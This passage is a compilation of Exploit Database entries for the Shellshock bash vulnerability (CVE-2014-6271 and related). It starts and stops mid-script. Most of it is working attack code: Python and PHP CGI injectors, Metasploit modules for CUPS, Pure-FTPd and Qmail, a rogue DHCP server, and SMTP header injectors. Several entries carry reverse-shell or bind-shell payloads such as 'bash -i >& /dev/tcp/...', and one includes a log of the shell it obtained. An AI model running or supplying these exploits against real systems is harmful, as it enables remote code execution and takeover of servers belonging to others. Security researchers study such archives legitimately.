-c 'nc -l -p "+rport+" -e /bin/bash &'" except: usage() else: print "[*] Unsupported payload" usage() try: pages = args['pages'].split(",") except: pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"] try: proxyhost,proxyport = args['proxy'].split(":") except: pass if args['payload'] == 'reverse': serversocket = socket(AF_INET, SOCK_STREAM) buff = 1024 addr = (lhost, lport) serversocket.bind(addr) serversocket.listen(10) print "[!] Started reverse shell handler" thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,)) if args['payload'] == 'bind': serversocket = socket(AF_INET, SOCK_STREAM) addr = (rhost,int(rport)) thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,)) buff = 1024 while True: if args['payload'] == 'reverse': clientsocket, clientaddr = serversocket.accept() print "[!] Successfully exploited" print "[!] Incoming connection from "+clientaddr[0] stop = True clientsocket.settimeout(3) while True: reply = raw_input(clientaddr[0]+"> ") clientsocket.sendall(reply+"\n") try: data = clientsocket.recv(buff) print data except: pass if args['payload'] == 'bind': try: serversocket = socket(AF_INET, SOCK_STREAM) time.sleep(1) serversocket.connect(addr) print "[!] Successfully exploited" print "[!] Connected to "+rhost stop = True serversocket.settimeout(3) while True: reply = raw_input(rhost+"> ") serversocket.sendall(reply+"\n") data = serversocket.recv(buff) print data except: pass
Exploit Database EDB-ID : 34766

Date de publication : 2014-09-24 22h00 +00:00
Auteur : Prakhar Prasad & Subho Halder
EDB Vérifié : Yes

<?php /* Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability CVE: 2014-6271 Vendor Homepage: https://www.gnu.org/software/bash/ Author: Prakhar Prasad && Subho Halder Author Homepage: https://prakharprasad.com && https://appknox.com Date: September 25th 2014 Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26 GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13) Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit" Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ Test CGI Code : #!/bin/bash echo "Content-type: text/html" echo "" echo "Bash-is-Vulnerable" */ error_reporting(0); if(!defined('STDIN')) die("Please run it through command-line!\n"); $x = getopt("u:c:"); if(!isset($x['u']) || !isset($x['c'])) { die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n"); } $url = $x['u']; $cmd = $x['c']; $context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ) ); $req = file_get_contents($url, false, $context); if(!$req && strpos($http_response_header[0],"500") > 0 ) die("Command sent to the server!\n"); else if($req && !strpos($http_response_header[0],"500") > 0) die("Server didn't respond as it should!\n"); else if(!$req && $http_response_header == NULL) die("A connection error occurred!\n") ?>
Exploit Database EDB-ID : 35115

Date de publication : 2014-10-28 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CUPS Filter Bash Environment Variable Code Injection', 'Description' => %q{ This module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables by default. }, 'Author' => [ 'Stephane Chazelas', # Vulnerability discovery 'lcamtuf', # CVE-2014-6278 'Brendan Coles <bcoles[at]gmail.com>' # msf ], 'References' => [ ['CVE', '2014-6271'], ['CVE', '2014-6278'], ['EDB', '34765'], ['URL', 'https://access.redhat.com/articles/1200223'], ['URL', 'http://seclists.org/oss-sec/2014/q3/649'] ], 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0A\x0D", 'DisableNops' => true }, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic bash awk ruby' }, # Tested: # - CUPS version 1.4.3 on Ubuntu 10.04 (x86) # - CUPS version 1.5.3 on Debian 7 (x64) # - CUPS version 1.6.2 on Fedora 19 (x64) # - CUPS version 1.7.2 on Ubuntu 14.04 (x64) 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 24 2014', 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(631), OptBool.new('SSL', [ true, 'Use SSL', true ]), OptString.new('USERNAME', [ true, 'CUPS username', 'root']), OptString.new('PASSWORD', [ true, 'CUPS user password', '']), OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]), OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ]) ], self.class) end # # CVE-2014-6271 # def cve_2014_6271(cmd) %{() { :;}; $(#{cmd}) & } end # # CVE-2014-6278 # def cve_2014_6278(cmd) %{() { _; } >_[$($())] { echo -e "\r\n$(#{cmd})\r\n" ; }} end # # Check credentials # def check @cookie = rand_text_alphanumeric(16) printer_name = rand_text_alphanumeric(10 + rand(5)) res = add_printer(printer_name, '') if !res vprint_error("#{peer} - No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/ vprint_status("#{peer} - Found CUPS version #{$1}") else print_status("#{peer} - Target is not a CUPS web server") return Exploit::CheckCode::Safe end if res.body =~ /Set Default Options for #{printer_name}/ vprint_good("#{peer} - Added printer successfully") delete_printer(printer_name) elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) vprint_error("#{peer} - Authentication failed") elsif res.code == 426 vprint_error("#{peer} - SSL required - set SSL true") end Exploit::CheckCode::Detected end # # Exploit # def exploit @cookie = rand_text_alphanumeric(16) printer_name = rand_text_alphanumeric(10 + rand(5)) # Select target CVE case datastore['CVE'] when 'CVE-2014-6278' cmd = cve_2014_6278(payload.raw) else cmd = cve_2014_6271(payload.raw) end # Add a printer containing the payload # with a CUPS filter pointing to /bin/bash res = add_printer(printer_name, cmd) if !res fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ print_good("#{peer} - Added printer successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.") else fail_with(Failure::Unknown, "#{peer} - Could not add printer.") end # Add a test page to the print queue. # The print job triggers execution of the bash filter # which executes the payload in the environment variables. res = print_test_page(printer_name) if !res fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ vprint_good("#{peer} - Added test page to printer queue") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.") else fail_with(Failure::Unknown, "#{peer} - Could not add test page to print queue.") end # Delete the printer res = delete_printer(printer_name) if !res fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ print_status("#{peer} - Deleted printer '#{printer_name}' successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.") else vprint_warning("#{peer} - Could not delete printer '#{printer_name}'") end end # # Add a printer to CUPS # def add_printer(printer_name, cmd) vprint_status("#{peer} - Adding new printer '#{printer_name}'") ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd" ppd_file = <<-EOF *PPD-Adobe: "4.3" *%==== General Information Keywords ======================== *FormatVersion: "4.3" *FileVersion: "1.00" *LanguageVersion: English *LanguageEncoding: ISOLatin1 *PCFileName: "#{ppd_name}" *Manufacturer: "Brother" *Product: "(Brother MFC-3820CN)" *1284DeviceID: "MFG:Brother;MDL:MFC-3820CN" *cupsVersion: 1.1 *cupsManualCopies: False *cupsFilter: "application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash" *cupsModelNumber: #{rand(10) + 1} *ModelName: "Brother MFC-3820CN" *ShortNickName: "Brother MFC-3820CN" *NickName: "Brother MFC-3820CN CUPS v1.1" *% *%==== Basic Device Capabilities ============= *LanguageLevel: "3" *ColorDevice: True *DefaultColorSpace: RGB *FileSystem: False *Throughput: "12" *LandscapeOrientation: Plus90 *VariablePaperSize: False *TTRasterizer: Type42 *FreeVM: "1700000" *DefaultOutputOrder: Reverse *%==== Media Selection ====================== *OpenUI *PageSize/Media Size: PickOne *OrderDependency: 18 AnySetup *PageSize *DefaultPageSize: BrLetter *PageSize BrA4/A4: "<</PageSize[595 842]/ImagingBBox null>>setpagedevice" *PageSize BrLetter/Letter: "<</PageSize[612 792]/ImagingBBox null>>setpagedevice" EOF pd = Rex::MIME::Message.new pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name="PPD_FILE"; filename="#{ppd_name}")) pd.add_part("#{@cookie}", nil, nil, %(form-data; name="org.cups.sid")) pd.add_part("add-printer", nil, nil, %(form-data; name="OP")) pd.add_part("#{printer_name}", nil, nil, %(form-data; name="PRINTER_NAME")) pd.add_part("", nil, nil, %(form-data; name="PRINTER_INFO")) # injectable pd.add_part("#{cmd}", nil, nil, %(form-data; name="PRINTER_LOCATION")) # injectable pd.add_part("file:///dev/null", nil, nil, %(form-data; name="DEVICE_URI")) data = pd.to_s data.strip! send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), 'ctype' => "multipart/form-data; boundary=#{pd.bound}", 'data' => data, 'cookie' => "org.cups.sid=#{@cookie};", 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) end # # Queue a printer test page # def print_test_page(printer_name) vprint_status("#{peer} - Adding test page to printer queue") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'printers', printer_name), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'cookie' => "org.cups.sid=#{@cookie}", 'vars_post' => { 'org.cups.sid' => @cookie, 'OP' => 'print-test-page' } ) end # # Delete a printer # def delete_printer(printer_name) vprint_status("#{peer} - Deleting printer '#{printer_name}'") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'cookie' => "org.cups.sid=#{@cookie}", 'vars_post' => { 'org.cups.sid' => @cookie, 'OP' => 'delete-printer', 'printer_name' => printer_name, 'confirm' => 'Delete Printer' } ) end end
Exploit Database EDB-ID : 34765

Date de publication : 2014-09-24 22h00 +00:00
Auteur : Stephane Chazelas
EDB Vérifié : Yes

Exploit Database Note: The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test
Exploit Database EDB-ID : 34860

Date de publication : 2014-10-01 22h00 +00:00
Auteur : @0x00string
EDB Vérifié : No

#!/usr/bin/python # Exploit Title: dhclient shellshocker # Google Dork: n/a # Date: 10/1/14 # Exploit Author: @0x00string # Vendor Homepage: gnu.org # Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz # Version: 4.3.11 # Tested on: Ubuntu 14.04.1 # CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 # ______ ______ ______ _ # / __ | / __ |/ __ | _ (_) #| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___ #| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___) #| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ | # \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/ # (_____| # _ _ _ _ # | | | | (_) _ # _ | | | _ ____| |_ ____ ____ | |_ # / || | || \ / ___) | |/ _ ) _ \| _) #( (_| | | | ( (___| | ( (/ /| | | | |__ # \____|_| |_|\____)_|_|\____)_| |_|\___) # # _ _ _ _ _ # | | | | | | | | | # ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____ # /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___) #|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| | #(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_| # this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts # once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out # The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability. # can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example. import socket, struct def HexToByte( hexStr ): b = [] h = ''.join( h.split(" ") ) for i in range(0, len(h), 2): b.append( chr( int (h[i:i+2], 16 ) ) ) return ''.join( b ) rport = 68 lport = 67 bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bsock.bind(("<broadcast>", lport)) while True: OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114 URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex") URLLEN = chr(len(URL) / 2).encode("hex") END = "03040a000001ff" broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048) hexip = broadcast_get[245:249] rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3])) XID = broadcast_get[4:8].encode("hex") chaddr = broadcast_get[29:34].encode("hex") print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n" OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END OFFER_BYTES = HexToByte(OFFER) ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END ACK_BYTES = HexToByte(ACK) print "[+]\tsending evil offer\n" sock.sendto(OFFER_BYTES, (rhost, rport)) broadcast_get2 = bsock.recvfrom(2048) print "[+]\tassuming request was received, sending ACK\n" sock.sendto(ACK_BYTES, (rhost, rport))
Exploit Database EDB-ID : 34879

Date de publication : 2014-10-03 22h00 +00:00
Auteur : hobbily plunt
EDB Vérifié : No

# Exploit Title: ShellShock OpenVPN Exploit # Date: Fri Oct 3 15:48:08 EDT 2014 # Exploit Author: hobbily AKA @fj33r # Version: 2.2.29 # Tested on: Debian Linux # CVE : CVE-2014-6271 #Probably should of submitted this the day I tweeted it. ### server.conf port 1194 proto udp dev tun client-cert-not-required auth-user-pass-verify /etc/openvpn/user.sh via-env tmp-dir "/etc/openvpn/tmp" ca ca.crt cert testing.crt key testing.key # This file should be kept secret dh dh1024.pem server 10.8.0.0 255.255.255.0 keepalive 10 120 comp-lzo user nobody group nogroup persist-key persist-tun client-cert-not-required plugin /usr/lib/openvpn/openvpn-auth-pam.so login script-security 3 status openvpn-status.log verb 3 ### user.sh #!/bin/bash echo "$username" echo "$password" ### start server openvpn server.con ### terminal 1 nc -lp 4444 ### terminal 2 sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo ### username && password were both shellshocked just incase user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 & pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 & ### log Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ] Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072] Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1 Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100 Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0 Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500 Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2 Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ] Mon Sep 29 20:56:56 2014 GID set to nogroup Mon Sep 29 20:56:56 2014 UID set to nobody Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef] Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef] Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256 Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0 Mon Sep 29 20:56:56 2014 Initialization Sequence Completed Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ] Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ] Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded' Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919' Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02 AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1 Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so _________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__ Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194 Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST' Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1) Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111) Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting ### nc listener nobody@debian:/etc/openvpn$ id id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) #shoutouts to Fredrik Str�mberg for the post he made on ycombinator
Exploit Database EDB-ID : 34896

Date de publication : 2014-10-05 22h00 +00:00
Auteur : Phil Blank
EDB Vérifié : Yes

#!/bin/python # Exploit Title: Shellshock SMTP Exploit # Date: 10/3/2014 # Exploit Author: fattymcwopr # Vendor Homepage: gnu.org # Software Link: http://ftp.gnu.org/gnu/bash/ # Version: 4.2.x < 4.2.48 # Tested on: Debian 7 (postfix smtp server w/procmail) # CVE : 2014-6271 from socket import * import sys def usage(): print "shellshock_smtp.py <target> <command>" argc = len(sys.argv) if(argc < 3 or argc > 3): usage() sys.exit(0) rport = 25 rhost = sys.argv[1] cmd = sys.argv[2] headers = ([ "To", "References", "Cc", "Bcc", "From", "Subject", "Date", "Message-ID", "Comments", "Keywords", "Resent-Date", "Resent-From", "Resent-Sender" ]) s = socket(AF_INET, SOCK_STREAM) s.connect((rhost, rport)) # banner grab s.recv(2048*4) def netFormat(d): d += "\n" return d.encode('hex').decode('hex') data = netFormat("mail from:<>") s.send(data) s.recv(2048*4) data = netFormat("rcpt to:<nobody>") s.send(data) s.recv(2048*4) data = netFormat("data") s.send(data) s.recv(2048*4) data = '' for h in headers: data += netFormat(h + ":() { :; };" + cmd) data += netFormat(cmd) # <CR><LF>.<CR><LF> data += "0d0a2e0d0a".decode('hex') s.send(data) s.recv(2048*4) data = netFormat("quit") s.send(data) s.recv(2048*4)
Exploit Database EDB-ID : 34862

Date de publication : 2014-10-01 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection', 'Description' => %q( This module exploits the code injection flaw known as shellshock which leverages specially crafted environment variables in Bash. This exploit specifically targets Pure-FTPd when configured to use an external program for authentication. ), 'Author' => [ 'Stephane Chazelas', # Vulnerability discovery 'Frank Denis', # Discovery of Pure-FTPd attack vector 'Spencer McIntyre' # Metasploit module ], 'References' => [ ['CVE', '2014-6271'], ['OSVDB', '112004'], ['EDB', '34765'], ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc'] ], 'Payload' => { 'DisableNops' => true, 'Space' => 2048 }, 'Targets' => [ [ 'Linux x86', { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'CmdStagerFlavor' => :printf } ], [ 'Linux x86_64', { 'Platform' => 'linux', 'Arch' => ARCH_X86_64, 'CmdStagerFlavor' => :printf } ] ], 'DefaultOptions' => { 'PrependFork' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 24 2014')) register_options( [ Opt::RPORT(21), OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']) ], self.class) deregister_options('FTPUSER', 'FTPPASS') end def check # this check method tries to use the vulnerability to bypass the login username = rand_text_alphanumeric(rand(20) + 1) random_id = (rand(100) + 1) command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end" if send_command(username, command) =~ /^2\d\d ok./i return CheckCode::Safe if banner !~ /pure-ftpd/i disconnect command = "echo auth_ok:0; echo end" if send_command(username, command) =~ /^5\d\d login authentication failed/i return CheckCode::Vulnerable end end disconnect CheckCode::Safe end def execute_command(cmd, _opts) cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod") username = rand_text_alphanumeric(rand(20) + 1) send_command(username, cmd) end def exploit # Cannot use generic/shell_reverse_tcp inside an elf # Checking before proceeds if generate_payload_exe.blank? fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload") end execute_cmdstager(linemax: 500) handler end def send_command(username, cmd) cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\"" connect send_user(username) password_result = send_pass(cmd) disconnect password_result end end
Exploit Database EDB-ID : 42938

Date de publication : 2017-10-01 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Smtp def initialize(info={}) super(update_info(info, 'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)', 'Description' => %q{ This module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH (Shellshock). This flaw works on the latest Qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed. }, 'Author' => [ 'Mario Ledo (Metasploit module)', 'Gabriel Follon (Metasploit module)', 'Kyle George (Vulnerability discovery)' ], 'License' => MSF_LICENSE, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'References' => [ ['CVE', '2014-6271'], ['CWE', '94'], ['OSVDB', '112004'], ['EDB', '34765'], ['URL', 'http://seclists.org/oss-sec/2014/q3/649'], ['URL', 'https://lists.gt.net/qmail/users/138578'] ], 'Payload' => { 'BadChars' => "\x3e", 'Space' => 888, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet perl ruby python' # telnet ruby python and perl works only if installed on target } }, 'Targets' => [ [ 'Automatic', { }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 24 2014' )) deregister_options('MAILFROM') end def smtp_send(data = nil) begin result = '' code = 0 sock.put("#{data}") result = sock.get_once result.chomp! if (result) code = result[0..2].to_i if result return result, code rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError return result, 0 rescue ::Exception => e print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'") return nil, 0 end end def exploit to = datastore['MAILTO'] connect result = smtp_send("HELO localhost\r\n") if result[1] < 200 || result[1] > 300 fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) end print_status('Sending the payload...') result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n") if result[1] < 200 || result[1] > 300 fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) end print_status("Sending RCPT TO #{to}") result = smtp_send("rcpt to:<#{to}>\r\n") if result[1] < 200 || result[1] > 300 fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) end result = smtp_send("data\r\n") if result[1] < 200 || result[1] > 354 fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) end result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n") if result[1] < 200 || result[1] > 300 fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error')) end disconnect end end
Exploit Database EDB-ID : 48651

Date de publication : 2020-07-07 22h00 +00:00
Auteur : 1F98D
EDB Vérifié : No

# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection # Date: 2020-07-03 # Exploit Author: 1F98D # Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon # Version: Qmail 1.03 # Tested on: Debian 9.11 (x64) # CVE: CVE-2014-6271 # References: # http://seclists.org/oss-sec/2014/q3/649 # https://lists.gt.net/qmail/users/138578 # # Qmail is vulnerable to a Shellshock vulnerability due to lack of validation # in the MAIL FROM field. # #!/usr/local/bin/python3 from socket import * import sys if len(sys.argv) != 4: print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0])) print("E.g. {} 127.0.0.1 'root@debian' 'touch /tmp/x'".format(sys.argv[0])) sys.exit(1) TARGET = sys.argv[1] MAILTO = sys.argv[2] CMD = sys.argv[3] s = socket(AF_INET, SOCK_STREAM) s.connect((TARGET, 25)) res = s.recv(1024) if 'ESMTP' not in str(res): print('[!] No ESMTP detected') print('[!] Received {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] ESMTP 